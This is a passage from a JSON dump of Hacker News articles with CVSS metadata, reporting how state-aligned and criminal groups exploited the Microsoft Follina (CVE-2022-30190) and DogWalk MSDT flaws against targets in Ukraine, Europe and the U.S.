Support Diagnostic Tool (MSDT) to send links pointing to Microsoft Office documents hosted on compromised websites targeting media entities in Ukraine.\n\nUAC-0098, a threat actor that CERT-UA last month warned of [distributing tax-themed documents](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>) carrying a Follina exploit, has also been assessed to be a former initial access broker with ties to the [Conti group](<https://thehackernews.com/2022/04/gold-ulrick-hackers-still-in-action.html>) and in charge of disseminating the IcedID banking trojan.\n\nOther kinds of cyber activity include credential phishing attacks mounted by an adversary referred to as COLDRIVER (aka Callisto) aimed at government and defense officials, politicians, NGOs and think tanks, and journalists.\n\nThese involve sending emails either directly, including the phishing domain or containing links to documents hosted on Google Drive and Microsoft OneDrive that, in turn, feature links to an attacker-controlled website designed to steal passwords.\n\nThe [latest developments](<https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html>) are yet another indication of how Russian threat actors are exhibiting continued signs of increasing sophistication in their attempts to target in ways that highlight their evolving techniques.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-20T05:58:00", "type": "thn", "title": "Russian Hackers Tricked Ukrainians with Fake \"DoS Android Apps to Target Russia\" \u2014 The Hacker News", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-21T03:06:16", "id": "THN:7A6D54BC76D090840197DDF871D59731", "href": "https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T15:35:06", "description": "[![Microsoft](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjWMKOvweSFs-6_yTKhS8Ei2IBg2vcJuX9wiigmwmv2hOkJWeIzjBRPZIGuCENyJ3ZhGbdw4r7S79Z_QdBYo0oVXNm1oL_JGsK3zHlILQmiu3OHiuBKqzhrFWj-vyyCk813l8T4dSdgnOz-c05mTwyfEA0pwW8cRr31kStWCgi_TDxMXnmMfDgheC7X/s728-e1000/windows.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjWMKOvweSFs-6_yTKhS8Ei2IBg2vcJuX9wiigmwmv2hOkJWeIzjBRPZIGuCENyJ3ZhGbdw4r7S79Z_QdBYo0oVXNm1oL_JGsK3zHlILQmiu3OHiuBKqzhrFWj-vyyCk813l8T4dSdgnOz-c05mTwyfEA0pwW8cRr31kStWCgi_TDxMXnmMfDgheC7X/s728-e100/windows.jpg>)\n\nA suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office \"Follina\" vulnerability to target government entities in Europe and the U.S.\n\nEnterprise security firm Proofpoint said it blocked attempts at exploiting the remote code execution flaw, which is being tracked as [CVE-2022-30190](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) (CVSS score: 7.8). No less than 1,000 phishing messages containing a lure document were sent to the targets.\n\n\"This campaign masqueraded as a salary increase and utilized an RTF with the exploit payload downloaded from 45.76.53[.]253,\" the company [said](<https://twitter.com/threatinsight/status/1532830739208732673>) in a series of tweets.\n\nThe payload, which manifests in the form of a PowerShell script, is Base64-encoded and functions as a downloader to retrieve a second PowerShell script from a remote server named \"seller-notification[.]live.\"\n\n\"This script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil[tration] to 45.77.156[.]179,\" the company added.\n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiF_m7_KsHBbfl6j9PPTd8t5DZ4_iAR6cG5PWwiqwiHn_YkdsXkjr3qRPs83Oje0Y5pqaKc2zav2Crnq-KH0HGQpBeKMWZaR8dtf2akXuHmO8cwk7tpkBX5uKcHjq5az14xOsPTCFUi71Lo2E4DebsFoKvV-d0ML_UZr_ap7hkNoBGdGo3Q4L6VVWgs/s728-e100/hacking.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiF_m7_KsHBbfl6j9PPTd8t5DZ4_iAR6cG5PWwiqwiHn_YkdsXkjr3qRPs83Oje0Y5pqaKc2zav2Crnq-KH0HGQpBeKMWZaR8dtf2akXuHmO8cwk7tpkBX5uKcHjq5az14xOsPTCFUi71Lo2E4DebsFoKvV-d0ML_UZr_ap7hkNoBGdGo3Q4L6VVWgs/s728-e100/hacking.jpg>)\n\nThe phishing campaign has not been linked to a previously known group, but said it was mounted by a nation-state actor based on the specificity of the targeting and the PowerShell payload's wide-ranging reconnaissance capabilities.\n\nThe development follows [active exploitation attempts](<https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html>) by a Chinese threat actor tracked as TA413 to deliver weaponized ZIP archives with malware-rigged Microsoft Word documents.\n\nThe Follina vulnerability, which leverages the \"ms-msdt:\" protocol URI scheme to remotely take control of target devices, remains unpatched, with Microsoft urging customers to [disable the protocol](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) to prevent the attack vector.\n\nIn the absence of a security update, 0patch has released an [unofficial fix](<https://blog.0patch.com/2022/06/free-micropatches-for-follina-microsoft.html>) to block ongoing attacks against Windows systems that target the Microsoft Windows Support Diagnostic Tool (MSDT) vulnerability.\n\n\"It doesn't matter which version of Office you have installed, or if you have Office installed at all: the vulnerability could also be exploited through [other attack vectors](<https://twitter.com/0xBacco/status/1531599168363548672>),\" 0patch's Mitja Kolsek said.\n\n\"Proofpoint continues to see targeted attacks leveraging CVE-2022-30190,\" Sherrod DeGrippo, vice president of threat research, said in a statement shared with The Hacker News.\n\n\"The extensive reconnaissance conducted by the second PowerShell script demonstrates an actor interested in a large variety of software on a target's computer. This, coupled with the tight targeting of European government and local U.S. governments, led us to suspect this campaign has a state aligned nexus.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-06T02:54:00", "type": "thn", "title": "State-Backed Hackers Exploit Microsoft 'Follina' Bug to Target Entities in Europe and U.S", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T12:27:16", "id": "THN:21FC29F7D7C7E2DA7D2F19E89085FD55", "href": "https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T05:56:38", "description": "[![Microsoft Windows Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiwTkerV_vHTBX6raliukL7HMmC-07MaqMLisxHNJsLFg2u_5hzd4ZSaJnJFMLEm0SVlgLnMNI92Aa_h88r1yM_IGDxGstGOjGOIKVBGqorBSAAMipARKlu8r3LBRAsgA8eMxIOakvY7qqrCIOl1eaoGiXrTVXgPmcTvvLkPjETYV958M7PhFiGwY3e/s728-e1000/hacking.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiwTkerV_vHTBX6raliukL7HMmC-07MaqMLisxHNJsLFg2u_5hzd4ZSaJnJFMLEm0SVlgLnMNI92Aa_h88r1yM_IGDxGstGOjGOIKVBGqorBSAAMipARKlu8r3LBRAsgA8eMxIOakvY7qqrCIOl1eaoGiXrTVXgPmcTvvLkPjETYV958M7PhFiGwY3e/s728-e100/hacking.jpg>)\n\nAn unofficial security patch has been made available for a new Windows zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), even as the Follina flaw continues to be exploited in the wild.\n\nThe issue \u2014 referenced as **DogWalk** \u2014 relates to a path traversal flaw that can be exploited to stash a malicious executable file to the Windows Startup folder when a potential target opens a specially crafted \".diagcab\" archive file that contains a diagnostics configuration file.\n\nThe idea is that the payload would get executed the next time the victim logs in to the system after a restart. The vulnerability affects all Windows versions, starting from Windows 7 and Server Server 2008 to the latest releases.\n\nDogWalk was originally [disclosed](<https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd>) by security researcher Imre Rad in January 2020 after Microsoft, having acknowledged the problem, deemed it as not a security issue.\n\n\"There are a number of file types that can execute code in such a way but aren't technically 'executables,'\" the tech giant said at the time. \"And a number of these are considered unsafe for users to download/receive in email, even '.diagcab' is blocked by default in Outlook on the web and other places.\"\n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwRgjGLI9aF8GGCJ21kc1Qb8R_OxNcdWLs-zRvaLoVcCrG09nD-xcOfE8LIElgnsXnfWznza6qP97ZirQ6SfMXCGN0TFK9XKjmm1Vl68Atu0RGUgpXh9rJ3kygy6lvLlR0bWkN0HolGLD7oh2TXsGE81KbEmYzDcLwQNm8sC0yQCVCw6UvA8jyuVrF/s728-e100/windows.gif)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwRgjGLI9aF8GGCJ21kc1Qb8R_OxNcdWLs-zRvaLoVcCrG09nD-xcOfE8LIElgnsXnfWznza6qP97ZirQ6SfMXCGN0TFK9XKjmm1Vl68Atu0RGUgpXh9rJ3kygy6lvLlR0bWkN0HolGLD7oh2TXsGE81KbEmYzDcLwQNm8sC0yQCVCw6UvA8jyuVrF/s728-e100/windows.gif>)\n\nWhile all files downloaded and received via email include a Mark-of-the-Web ([MOTW](<https://attack.mitre.org/techniques/T1553/005/>)) tag that's used to determine their origin and trigger an appropriate security response, 0patch's Mitja Kolsek noted that the MSDT application is not designed to check this flag and hence allows the .diagcab file to be opened without warning.\n\n\"Outlook is not the only delivery vehicle: such file is cheerfully downloaded by all major browsers including Microsoft Edge by simply visiting(!) a website, and it only takes a single click (or mis-click) in the browser's downloads list to have it opened,\" Kolsek [said](<https://blog.0patch.com/2022/06/microsoft-diagnostic-tools-dogwalk.html>).\n\n\"No warning is shown in the process, in contrast to downloading and opening any other known file capable of executing [the] attacker's code.\"\n\nThe patches and the [renewed interest](<https://twitter.com/j00sean/status/1532416426702786560>) in the zero-day bug follow [active exploitation](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) of the \"[Follina](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>)\" remote code execution vulnerability by leveraging malware-laced Word documents that abuse the \"ms-msdt:\" protocol URI scheme.\n\nAccording to enterprise security firm Proofpoint, the flaw (CVE-2022-30190, CVSS score: 7.8) is being weaponized by a threat actor tracked as [TA570](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) to deliver the [QBot](<https://thehackernews.com/2022/01/researchers-decrypted-qakbot-banking.html>) (aka Qakbot) information-stealing trojan.\n\n\"Actor uses thread hijacked messages with HTML attachments which, if opened, drop a ZIP archive,\" the company [said](<https://twitter.com/threatinsight/status/1534227444915482625>) in a series of tweets detailing the phishing attacks.\n\n\"Archive contains an IMG with a Word doc, shortcut file, and DLL. The LNK will execute the DLL to start QBot. The doc will load and execute a HTML file containing PowerShell abusing CVE-2022-30190 used to download and execute QBot.\"\n\nQBot has also been employed by [initial access brokers](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) to gain initial access to target networks, enabling ransomware affiliates to [abuse the foothold](<https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/>) to deploy file-encrypting malware.\n\nThe DFIR Report, earlier this year, also [documented](<https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/>) how QBot infections move at a rapid pace, enabling the malware to harvest browser data and Outlook emails a mere 30 minutes after initial access and propagate the payload to an adjacent workstation around the 50-minute mark.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T14:24:00", "type": "thn", "title": "Researchers Warn of Unpatched \"DogWalk\" Microsoft Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-09T05:26:49", "id": "THN:A24E3ECC17FDA35932981ED1D0B9B351", "href": "https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-07T15:29:02", "description": "[![Microsoft Follina Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhTNQLTqzRs1icO7nDf4jqaFdrqEQOglIjZdWwjLdPrfKMRyk55GksD5wNcAuXtq2syUw1ZGchuL7kfSaCip0NcKRKc0tvt4HKsngNfLJLu_wGgxPW6x3UL9JFBm5cSmmq4EorVcffa9KUUO0-_bLx-vTe857ciAdVTPSOFQ_XHk1j7o3-Tuau9QxI9/s728-e1000/russian-hackers.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhTNQLTqzRs1icO7nDf4jqaFdrqEQOglIjZdWwjLdPrfKMRyk55GksD5wNcAuXtq2syUw1ZGchuL7kfSaCip0NcKRKc0tvt4HKsngNfLJLu_wGgxPW6x3UL9JFBm5cSmmq4EorVcffa9KUUO0-_bLx-vTe857ciAdVTPSOFQ_XHk1j7o3-Tuau9QxI9/s728-e100/russian-hackers.jpg>)\n\nThe Computer Emergency Response Team of Ukraine (CERT-UA) has [cautioned](<https://cert.gov.ua/article/341128>) of a new set of spear-phishing attacks exploiting the \"Follina\" flaw in the Windows operating system to deploy password-stealing malware.\n\nAttributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled \"Nuclear Terrorism A Very Real Threat.rtf\" that, when opened, exploits the recently disclosed vulnerability to download and execute a malware called CredoMap.\n\nFollina ([CVE-2022-30190](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>), CVSS score: 7.8), which concerns a case of remote code execution affecting the Windows Support Diagnostic Tool (MSDT), was addressed by Microsoft on June 14, as part of its [Patch Tuesday updates](<https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html>), but not before it was subjected to widespread zero-day exploit activity by numerous threat actors.\n\nAccording to an independent report published by Malwarebytes, [CredoMap](<https://www.virustotal.com/gui/file/2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933/detection>) is a variant of the .NET-based credential stealer that Google Threat Analysis Group (TAG) [divulged](<https://thehackernews.com/2022/05/ukraine-war-themed-files-become-lure-of.html>) last month as having been deployed against users in Ukraine.\n\nThe malware's main purpose is to siphon data, including passwords and saved cookies, from several popular browsers such as Google Chrome, Microsoft Edge, and Mozilla Firefox.\n\n[![Russian Hackers Targeting Ukraine](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh1wPqkssWrspfFOV5JuqLYAuDaLjNgv0a4oY8utz6q-r8kkw4cw-U5qVZ_722pltmgZkJurfEHQKzfPepXA4DbY8QO48_whxdsmYcUA_f9jEjd-cYusjkZBmv0ozmOrz7CoM8xsOCjZyhYHFAjAYS5s_55J1l_yYV7WaDuogX68QqWZhDqjL9e9Bt5/s728-e1000/russian.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh1wPqkssWrspfFOV5JuqLYAuDaLjNgv0a4oY8utz6q-r8kkw4cw-U5qVZ_722pltmgZkJurfEHQKzfPepXA4DbY8QO48_whxdsmYcUA_f9jEjd-cYusjkZBmv0ozmOrz7CoM8xsOCjZyhYHFAjAYS5s_55J1l_yYV7WaDuogX68QqWZhDqjL9e9Bt5/s728-e100/russian.jpg>)\n\n[![Russian Hackers Targeting Ukraine](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEikeYfsPFY9KOWRt-wVKU533O8GTExdxYCnObIBP0XUPKaMQxzFMHJjcimjK_PVdu4_vU7TcyG4zQwzEroQSc6F8tl_QlNVzIi3GT6HY9Ufv-qcHbOr40bklODPdP5PJxl6VSNABxjdm24e3cx6nkZE-6G_dmvdoCwngGhCBnBIc6gf-EiESSQaoAcZ/s728-e1000/ms.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEikeYfsPFY9KOWRt-wVKU533O8GTExdxYCnObIBP0XUPKaMQxzFMHJjcimjK_PVdu4_vU7TcyG4zQwzEroQSc6F8tl_QlNVzIi3GT6HY9Ufv-qcHbOr40bklODPdP5PJxl6VSNABxjdm24e3cx6nkZE-6G_dmvdoCwngGhCBnBIc6gf-EiESSQaoAcZ/s728-e100/ms.jpg>)\n\n\"Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence,\" Malwarebytes [said](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>). \"The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state.\"\n\nIt's not just APT28. CERT-UA has further [warned](<https://cert.gov.ua/article/160530>) of [similar](<https://cert.gov.ua/article/339662>) [attacks](<https://cert.gov.ua/article/40559>) mounted by [Sandworm](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) and an actor dubbed UAC-0098 that leverage a Follina-based infection chain to deploy CrescentImp and Cobalt Strike Beacons on to targeted hosts in media and critical infrastructure entities.\n\nThe development comes as Ukraine continues to be a [target for cyberattacks](<https://thehackernews.com/2022/05/ukrainian-cert-warns-citizens-of-new.html>) amidst the country's ongoing war with Russia, with [Armageddon hackers](<https://thehackernews.com/2022/04/russian-hackers-tried-attacking.html>) also spotted [distributing](<https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine>) the [GammaLoad.PS1_v2 malware](<https://cert.gov.ua/article/40240>) in May 2022.\n\n**_Update:_** Amidst relentless hacking attempts tailored to drop malware in Ukrainian organizations, Microsoft revealed in a [special report](<https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/>) that state-backed Russian hackers have engaged in \"strategic espionage\" against 128 targets spanning governments, think tanks, businesses, and aid groups in 42 countries supporting Kyiv since the onset of the war.\n\n49% of the observed activity focused on government agencies, followed by IT (20%), critical infrastructure (19%), and NGOs (12%). Just 29% of these intrusions are said to have been successful, with a quarter of the incidents leading to the exfiltration of sensitive data.\n\n\"To date, the Russians haven't used destructive 'wormable' malware that can jump from one computer domain to another and thereby cross international borders to spread economic damage,\" the Redmond-based tech giant said.\n\n\"Instead, they are designing attacks to stay within Ukraine. While Russia has been careful to confine its destructive malware to specific network domains located within Ukraine itself, these attacks are more sophisticated and widespread.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-22T12:51:00", "type": "thn", "title": "Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-07T14:46:15", "id": "THN:B8CBCDA7152660D9AE3D4E058B7B9B0F", "href": "https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-11T04:24:57", "description": "[![RomCom RAT](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgFHymFOJd3tPPoZ3CmzEE1JuGEeJB_buMcEX7y9U9LXqwzhudzbUxmKboFn0vfRh64d5ZU04qA9VIx3frHrYgN98TrWzJXK7xKO3jT9zLm5grspYmrMg7C1UhSw4cNPiHsje4SzM_AGbLVo-TsCje_Emgro9q0RBJIwFhU9uKpG6zVtcl-YDB83sSw6XjI/s728-e365/tkfhFBCm.jpg>)\n\nThe threat actors behind the RomCom RAT have been suspected of phishing attacks targeting the [upcoming NATO Summit](<https://en.wikipedia.org/wiki/2023_Vilnius_summit>) in Vilnius as well as an identified organization supporting Ukraine abroad.\n\nThe findings come from the BlackBerry Threat Research and Intelligence team, which [found](<https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit>) two malicious documents submitted from a Hungarian IP address on July 4, 2023.\n\nRomCom, also tracked under the names Tropical Scorpius, UNC2596, and Void Rabisu, was [recently observed](<https://thehackernews.com/2023/05/romcom-rat-using-deceptive-web-of-rogue.html>) staging cyber attacks against politicians in Ukraine who are working closely with Western countries and a U.S.-based healthcare organization involved with aiding refugees fleeing the war-torn country.\n\nAttack chains mounted by the group are geopolitically motivated and have employed spear-phishing emails to point victims to cloned websites hosting trojanized versions of popular software. Targets include militaries, food supply chains, and IT companies.\n\nThe latest lure documents identified by BlackBerry impersonate Ukrainian World Congress, a legitimate non-profit, (\"[Overview_of_UWCs_UkraineInNATO_campaign.docx](<https://www.virustotal.com/gui/file/a61b2eafcf39715031357df6b01e85e0d1ea2e8ee1dfec241b114e18f7a1163f>)\") and feature a bogus letter declaring support for Ukraine's inclusion to NATO (\"[Letter_NATO_Summit_Vilnius_2023_ENG(1).docx](<https://www.virustotal.com/gui/file/3a3138c5add59d2172ad33bc6761f2f82ba344f3d03a2269c623f22c1a35df97>)\").\n\n\"Although we haven't yet uncovered the initial infection vector, the threat actor likely relied on spear-phishing techniques, engaging their victims to click on a specially crafted replica of the Ukrainian World Congress website,\" the Canadian company said in an analysis published last week.\n\nOpening the file triggers a sophisticated execution sequence that entails retrieving intermediate payloads from a remote server, which, in turn, exploits Follina ([CVE-2022-30190](<https://thehackernews.com/2023/05/xworm-malware-exploits-follina.html>)), a now-patched security flaw affecting Microsoft's Support Diagnostic Tool (MSDT), to achieve remote code execution.\n\nUPCOMING WEBINAR\n\n[\ud83d\udd10 PAM Security \u2013 Expert Solutions to Secure Your Sensitive Accounts\n\n](<https://thn.news/pam-webinar>)\n\nThis expert-led webinar will equip you with the knowledge and strategies you need to transform your privileged access security strategy.\n\n[Reserve Your Spot](<https://thn.news/pam-webinar>)\n\nThe result is the deployment of RomCom RAT, an executable written in C++ that's designed to collect information about the compromised system and remote commandeer it.\n\n\"Based on the nature of the upcoming NATO Summit and the related lure documents sent out by the threat actor, the intended victims are representatives of Ukraine, foreign organizations, and individuals supporting Ukraine,\" BlackBerry said.\n\n\"Based on the available information, we have medium to high confidence to conclude that this is a RomCom rebranded operation, or that one or more members of the RomCom threat group are behind this new campaign supporting a new threat group.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-10T06:42:00", "type": "thn", "title": "RomCom RAT Targeting NATO and Ukraine Support Groups", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-11T03:32:37", "id": "THN:C17A0F3DD156CF2240FAEABA6716D0E9", "href": "https://thehackernews.com/2023/07/romcom-rat-targeting-nato-and-ukraine.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T17:56:10", "description": "[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh4XDd5jxlShcQhkpFMeDWuIXh2lmuW6g-pOpYsWcAxsVQeXRD_zrP4VSvk676NwsbCPmQ3N8RbQ0Ox5emUCLWdANDTfkxyX8ZNmIeOx8--iO40HnXyGESjApgsZEkN1p7JZLQWLLVJ3imK_5umSJiUUWXduvPJeQ_nLWxfSUN92U64HfLhpAUbxKty/s728-e100/Windows-Update.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh4XDd5jxlShcQhkpFMeDWuIXh2lmuW6g-pOpYsWcAxsVQeXRD_zrP4VSvk676NwsbCPmQ3N8RbQ0Ox5emUCLWdANDTfkxyX8ZNmIeOx8--iO40HnXyGESjApgsZEkN1p7JZLQWLLVJ3imK_5umSJiUUWXduvPJeQ_nLWxfSUN92U64HfLhpAUbxKty/s728-e100/Windows-Update.jpg>)\n\nMicrosoft on Monday published guidance for a newly discovered [zero-day security flaw](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) in its Office productivity suite that could be exploited to achieve code execution on affected systems.\n\nThe weakness, now assigned the identifier [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is rated 7.8 out of 10 for severity on the CVSS vulnerability scoring system. Microsoft Office versions Office 2013, Office 2016, 